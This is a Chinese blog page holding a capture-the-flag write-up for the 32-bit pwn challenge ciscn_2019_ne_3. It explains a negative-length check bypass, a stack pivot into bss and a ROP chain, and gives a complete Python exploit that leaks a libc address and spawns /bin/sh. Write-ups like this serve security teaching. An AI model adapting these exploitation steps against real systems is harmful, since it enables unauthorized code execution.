<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>ciscn_2019_ne_3 - Lynne&#039;s House</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Lynne&#039;s House"><meta name="msapplication-TileImage" content="/img/favicon.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Lynne&#039;s House"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="总结一道很无语的rop的题目，由于在puts调用中会卡在[ebp - 0x46c]这样的语句，所以只能把栈往抬高，避免访问到不可写的内存区域。  如果题目给的rop很短，那么需要想办法调用read写入更长的rop链 必要的时候需要把栈抬高，避免在函数调用过程中，让不可写的内存写入了东西，直接core dump call的时候会放置下一条指令到esp，但如果直接覆写了esp，那么还是可以继续劫持程序"><meta property="og:type" content="blog"><meta property="og:title" content="ciscn_2019_ne_3"><meta property="og:url" content="https://roderickchan.github.io/2021/09/12/ciscn-2019-ne-3/"><meta property="og:site_name" content="Lynne&#039;s House"><meta property="og:description" content="总结一道很无语的rop的题目，由于在puts调用中会卡在[ebp - 0x46c]这样的语句，所以只能把栈往抬高，避免访问到不可写的内存区域。  如果题目给的rop很短，那么需要想办法调用read写入更长的rop链 必要的时候需要把栈抬高，避免在函数调用过程中，让不可写的内存写入了东西，直接core dump call的时候会放置下一条指令到esp，但如果直接覆写了esp，那么还是可以继续劫持程序"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160406760.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160631922.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160709015.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160859021.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912161735548.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162318146.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162424638.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162453753.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162712826.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162150712.png"><meta property="article:published_time" content="2021-09-12T07:59:20.000Z"><meta property="article:modified_time" content="2021-09-12T08:27:19.165Z"><meta property="article:author" content="Roderick Chan"><meta property="article:tag" content="pwn"><meta property="article:tag" content="rop"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160406760.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://roderickchan.github.io/2021/09/12/ciscn-2019-ne-3/"},"headline":"ciscn_2019_ne_3","image":["https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160406760.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160631922.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160709015.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160859021.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912161735548.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162318146.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162424638.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162453753.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162712826.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162150712.png"],"datePublished":"2021-09-12T07:59:20.000Z","dateModified":"2021-09-12T08:27:19.165Z","author":{"@type":"Person","name":"Roderick Chan"},"description":"总结一道很无语的rop的题目，由于在puts调用中会卡在[ebp - 0x46c]这样的语句，所以只能把栈往抬高，避免访问到不可写的内存区域。  如果题目给的rop很短，那么需要想办法调用read写入更长的rop链 必要的时候需要把栈抬高，避免在函数调用过程中，让不可写的内存写入了东西，直接core dump call的时候会放置下一条指令到esp，但如果直接覆写了esp，那么还是可以继续劫持程序"}</script><link rel="canonical" href="https://roderickchan.github.io/2021/09/12/ciscn-2019-ne-3/"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/monokai-sublime.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><script>var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?27073e91605117ab39e4af711d4afb4a";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();</script><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/cookieconsent/3.1.1/cookieconsent.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.4.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="Lynne&#039;s House" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/RoderickChan"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item copyright article-title type-2">原创</span><span class="level-item"><time dateTime="2021-09-12T07:59:20.000Z" title="9/12/2021, 3:59:20 PM">2021-09-12</time>发表</span><span class="level-item"><time dateTime="2021-09-12T08:27:19.165Z" title="9/12/2021, 4:27:19 PM">2021-09-12</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/CTF/">CTF</a><span> / </span><a class="link-muted" href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></span><span class="level-item">7 分钟读完 (大约1091个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile"> ciscn_2019_ne_3</h1><div class="copyright article-block type-2"><p>版权申明：本文为原创文章，转载请注明原文出处</p><p>原文链接：<a href="https://roderickchan.github.io/2021/09/12/ciscn-2019-ne-3/" target="_blank">https://roderickchan.github.io/2021/09/12/ciscn-2019-ne-3/</a></p></div><div class="content"><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>一道很无语的<code>rop</code>的题目，由于在<code>puts</code>调用中会卡在<code>[ebp - 0x46c]</code>这样的语句，所以只能把栈往抬高，避免访问到不可写的内存区域。</p>
<ul>
<li>如果题目给的<code>rop</code>很短，那么需要想办法调用<code>read</code>写入更长的<code>rop</code>链</li>
<li>必要的时候需要把栈抬高，避免在函数调用过程中，让不可写的内存写入了东西，直接<code>core dump</code></li>
<li><code>call</code>的时候会放置下一条指令到<code>esp</code>，但如果直接覆写了<code>esp</code>，那么还是可以继续劫持程序流</li>
</ul>
<span id="more"></span>
<h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><h4 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h4><p>很久没碰到<code>32</code>位的题目了，环境为<code>libc-2.27.so</code></p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160406760.png" alt="image-20210912160406760"></p>
<h4 id="函数分析"><a href="#函数分析" class="headerlink" title="函数分析"></a>函数分析</h4><p>最开始的时候，<code>IDA</code>无法识别函数。只需要在<code>__printf_chk</code>这个函数上按下<code>Y</code>，修改函数签名为<code>int __printf_chk(int, const char*, ...);</code>即可</p>
<p>流程很简单，先往<code>bss</code>段上写数据，然后有整数溢出和栈溢出：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160631922.png" alt="image-20210912160631922"></p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160709015.png" alt="image-20210912160709015"></p>
<p>刚开始以为是很简单的栈溢出，后来瞅了眼<code>main</code>函数退出的时候的汇编，发现栈直接被改变了：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912160859021.png" alt="image-20210912160859021"></p>
<p>这里的<code>esp</code>来自于<code>ecx</code>，而<code>ecx</code>可控。没有地址泄露，所以只能往<code>bss</code>段搞栈迁移。</p>
<p>所以一开始直接准备：</p>
<ul>
<li><code>puts</code>泄露地址</li>
<li>重新执行<code>main</code></li>
<li>再次<code>rop</code>执行<code>system(/bin/sh)</code>、</li>
</ul>
<p>然而事情，并没有那么简单，在调用<code>puts</code>的时候，由于栈太低了，会往更低处的不可写的区域赋值，程序直接<code>GG</code>。然后想改成<code>__printf_chk</code>，也遇到了类似的问题。</p>
<p>所以只能找一下<code>read</code>函数，然后重新写一段长的<code>rop</code>，并把栈抬到高处，再进行泄露和利用。</p>
<p>在输入<code>passwd</code>长度的时候，只能写入<code>0x10</code>个字节。去掉要转化为负数的<code>-1\x00\x00</code>，只剩<code>12</code>个字节可以操作。如果直接<code>rop</code>，由于<code>read</code>有<code>3</code>个参数，所以至少需要<code>0x14</code>的大小，很显然这里不够。所以只能利用程序中的<code>call read</code>这样的汇编执令来缩小<code>rop</code>的长度。</p>
<p>我们必须要控制的参数有<code>read</code>的第二个和第三个参数，指明往<code>bss</code>段写和写的大小。那么第一个参数<code>fd</code>就没法控制，好在程序中就有，如下图：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912161735548.png" alt="image-20210912161735548"></p>
<p>有一个<code>push 0</code>，省了不少事情。</p>
<p>因此，最终的解题思路为：</p>
<ul>
<li><p>将栈迁移到<code>bss</code>段</p>
</li>
<li><p><code>rop</code>往<code>buf</code>区域写更长的<code>rop</code></p>
</li>
<li>将栈抬高</li>
<li>执行<code>puts</code>泄露地址</li>
<li>再次执行<code>read</code>读入<code>rop</code></li>
<li>执行<code>system(/bin/sh)</code></li>
</ul>
<p>这里还是不能回到<code>main</code>函数，还是会出现往非法内存区域写入的操作。索性直接再次读入<code>rop</code>，然后刚好<code>esp</code>也在<code>bss</code>段上，所以可控制执行<code>system(/bin/sh)</code></p>
<h3 id="Exp"><a href="#Exp" class="headerlink" title="Exp"></a>Exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwncli <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">cli_script()</span><br><span class="line"></span><br><span class="line">p:tube = gift[<span class="string">&#x27;io&#x27;</span>]</span><br><span class="line">elf:ELF = gift[<span class="string">&#x27;elf&#x27;</span>]</span><br><span class="line">libc: ELF = ELF(<span class="string">&#x27;libc-2.27-32bit.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">输入负数即可绕过校验</span></span><br><span class="line"><span class="string">之后进行rop</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">buffer_addr = <span class="number">0x0804A060</span></span><br><span class="line">puts_addr = <span class="number">0x8048490</span></span><br><span class="line">puts_got_addr = <span class="number">0x804A01C</span></span><br><span class="line">main_addr = <span class="number">0x80486ea</span></span><br><span class="line"></span><br><span class="line">read_addr = <span class="number">0x8048460</span></span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">&quot;Now, Challenger, What&#x27;s name?\n:&quot;</span>, <span class="string">&quot;aaaaaa&quot;</span>)</span><br><span class="line">p.sendafter(<span class="string">&quot;Please set the length of password: &quot;</span>, <span class="string">b&quot;-1\x00\x00&quot;</span>+p32(<span class="number">0x8048793</span>)+p32(buffer_addr)+p32(<span class="number">0xf00</span>))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&quot;:&quot;</span>, flat(<span class="string">&quot;a&quot;</span>*<span class="number">72</span>, </span><br><span class="line">buffer_addr+<span class="number">8</span>, <span class="comment"># ecx</span></span><br><span class="line"><span class="number">0</span>, <span class="comment">#ebx</span></span><br><span class="line"><span class="number">0</span>, <span class="comment"># edi</span></span><br><span class="line">buffer_addr + <span class="number">0xf00</span>, <span class="comment"># ebp</span></span><br><span class="line">))</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">payload = flat(&#123;</span><br><span class="line">    <span class="number">0</span>:[<span class="number">0x080487B3</span>, buffer_addr+<span class="number">0x500</span>, <span class="number">0</span>, <span class="number">0</span>, buffer_addr+<span class="number">0xf00</span>],</span><br><span class="line">    <span class="number">0x500</span>-<span class="number">4</span>: [puts_addr, <span class="number">0x08048431</span>, puts_got_addr, read_addr, <span class="number">0</span>, <span class="number">0</span>, buffer_addr, <span class="number">0xf00</span>]</span><br><span class="line">&#125;, filler=<span class="string">&quot;\x00&quot;</span>)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">msg = p.recvuntil(<span class="string">&quot;\xf7&quot;</span>)</span><br><span class="line"></span><br><span class="line">libc_base_addr = u32(msg[-<span class="number">4</span>:]) - libc.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">log_libc_base_addr(libc_base_addr)</span><br><span class="line">libc.address = libc_base_addr</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.send(flat(<span class="string">&quot;/bin/sh\x00&quot;</span>, cyclic(<span class="number">0x4ec</span>-<span class="number">8</span>), libc.sym[<span class="string">&#x27;system&#x27;</span>], <span class="number">0</span>, buffer_addr))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>栈迁移：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162318146.png" alt="image-20210912162318146"></p>
<p>泄露地址：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162424638.png" alt="image-20210912162424638"></p>
<p>第二次<code>read</code>：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162453753.png" alt="image-20210912162453753"></p>
<p>拿<code>shell</code>：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162712826.png" alt="image-20210912162712826"></p>
<p>远程打：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210912162150712.png" alt="image-20210912162150712"></p>
<h3 id="引用与参考"><a href="#引用与参考" class="headerlink" title="引用与参考"></a>引用与参考</h3><p>1、<a href="https://roderickchan.github.io">My Blog</a></p>
<p>2、<a target="_blank" rel="noopener" href="https://ctf-wiki.org/">Ctf Wiki</a></p>
<p>3、<a target="_blank" rel="noopener" href="https://github.com/RoderickChan/pwncli">pwncli</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>ciscn_2019_ne_3</p><p><a href="https://roderickchan.github.io/2021/09/12/ciscn-2019-ne-3/">https://roderickchan.github.io/2021/09/12/ciscn-2019-ne-3/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Roderick Chan</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2021-09-12</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2021-09-12</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/pwn/">pwn</a><a class="link-muted mr-2" rel="tag" href="/tags/rop/">rop</a></div><div class="sharethis-inline-share-buttons"></div><script src="https://platform-api.sharethis.com/js/sharethis.js#property=606007929c00ae0011d418d7&amp;product=inline-share-buttons" defer></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/img/alipay.jpg" alt="支付宝"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/img/wechat.png" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2021/09/12/wdb-2018-semifinal-pwn1/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">wdb_2018_semifinal_pwn1</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/09/12/ciscn-2019-pwn%E7%B3%BB%E5%88%97/"><span class="level-item">ciscn-2019-pwn系列</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div class="content" id="valine-thread"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/valine/1.4.14/Valine.min.js"></script><script>new Valine({
            el: '#valine-thread' ,
            appId: "Cm6SOyxcRow2ynGlFReSz3y4-gzGzoHsz",
            appKey: "oL6sTozQUPUAAe5Yl5JR4h9w",
            placeholder: "leave your comments",
            avatar: "mp",
            
            meta: ["nick","mail"],
            pageSize: 10,
            lang: "zh-CN",
            visitor: true,
            highlight: true,
            
            
            
            
            
            requiredFields: [],
        });</script></div></div></div><!--!--><div class="column column-right is-4-tablet is-4-desktop is-4-widescreen  order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#总结"><span class="level-left"><span class="level-item">1</span><span class="level-item">总结</span></span></a></li><li><a class="level is-mobile" href="#题目分析"><span class="level-left"><span class="level-item">2</span><span class="level-item">题目分析</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#checksec"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">checksec</span></span></a></li><li><a class="level is-mobile" href="#函数分析"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">函数分析</span></span></a></li></ul></li><li><a class="level is-mobile" href="#Exp"><span class="level-left"><span class="level-item">3</span><span class="level-item">Exp</span></span></a></li><li><a class="level is-mobile" href="#引用与参考"><span class="level-left"><span class="level-item">4</span><span class="level-item">引用与参考</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-11-07T13:16:45.000Z">2021-11-07</time></p><p class="title"><a href="/2021/11/07/%E9%99%87%E5%8E%9F%E6%88%98%E7%96%AB2021%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B-pwn-wp/">陇原战疫2021网络安全大赛-pwn-wp</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/Contest-Wp/">Contest Wp</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-10-29T12:51:17.000Z">2021-10-29</time></p><p class="title"><a href="/2021/10/29/xman-2019-nooocall/">xman_2019_nooocall</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-10-24T10:20:55.000Z">2021-10-24</time></p><p class="title"><a href="/2021/10/24/ciscn-2019-es-3/">ciscn_2019_es_3</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-10-24T09:00:59.000Z">2021-10-24</time></p><p class="title"><a href="/2021/10/24/ciscn-final-10/">ciscn_final_10</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-10-23T07:12:12.000Z">2021-10-23</time></p><p class="title"><a href="/2021/10/23/cscctf-2019-final-childrenheap/">cscctf_2019_final_childrenheap</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article></div></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">61</span></span></a><ul><li><a class="level is-mobile" href="/categories/CTF/Contest-Wp/"><span class="level-start"><span class="level-item">Contest Wp</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/categories/CTF/crypto%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"><span class="level-start"><span class="level-item">crypto做题记录</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"><span class="level-start"><span class="level-item">pwn做题记录</span></span><span class="level-end"><span class="level-item tag">57</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E5%B7%A5%E5%85%B7%E4%B8%8E%E8%84%9A%E6%9C%AC/"><span class="level-start"><span class="level-item">工具与脚本</span></span><span class="level-end"><span class="level-item tag">3</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E5%B7%A5%E5%85%B7%E4%B8%8E%E8%84%9A%E6%9C%AC/python/"><span class="level-start"><span class="level-item">python</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/FSOP/"><span class="tag">FSOP</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/IO-FILE/"><span class="tag">IO_FILE</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/alarm/"><span class="tag">alarm</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/canary/"><span class="tag">canary</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/ciscn-2019/"><span class="tag">ciscn 2019</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/crypto/"><span class="tag">crypto</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/fastbin-attack/"><span class="tag">fastbin attack</span><span class="tag">8</span></a></div><div class="control"><a class="tags has-addons" href="/tags/fini-array/"><span class="tag">fini.array</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/got-plt/"><span class="tag">got.plt</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/house-of-force/"><span class="tag">house of force</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/house-of-orange/"><span class="tag">house of orange</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/jmp-short/"><span class="tag">jmp short</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/largebin-attack/"><span class="tag">largebin attack</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/main-arena/"><span class="tag">main_arena</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/malloc-hook/"><span class="tag">malloc_hook</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/non-stack-printf/"><span class="tag">non-stack printf</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/off-by-null/"><span class="tag">off by null</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/one-gadget/"><span class="tag">one_gadget</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/print/"><span class="tag">print</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/printf/"><span class="tag">printf</span><span class="tag">8</span></a></div><div class="control"><a class="tags has-addons" href="/tags/printf-attack/"><span class="tag">printf attack</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/pwn/"><span class="tag">pwn</span><span class="tag">61</span></a></div><div class="control"><a class="tags has-addons" href="/tags/python/"><span class="tag">python</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/realloc/"><span class="tag">realloc</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/realloc-hook/"><span class="tag">realloc_hook</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/rop/"><span class="tag">rop</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/rsa/"><span class="tag">rsa</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/rtld-global/"><span class="tag">rtld_global</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/shellcode/"><span class="tag">shellcode</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/srop/"><span class="tag">srop</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/stack-pivot/"><span class="tag">stack pivot</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/stack-smash/"><span class="tag">stack smash</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/stdout/"><span class="tag">stdout</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/syscall/"><span class="tag">syscall</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-bin-attack/"><span class="tag">tcache bin attack</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-dup/"><span class="tag">tcache dup</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-perthread-corruption/"><span class="tag">tcache perthread corruption</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-poisoning/"><span class="tag">tcache poisoning</span><span class="tag">1</span></a></div><div class="control"><a 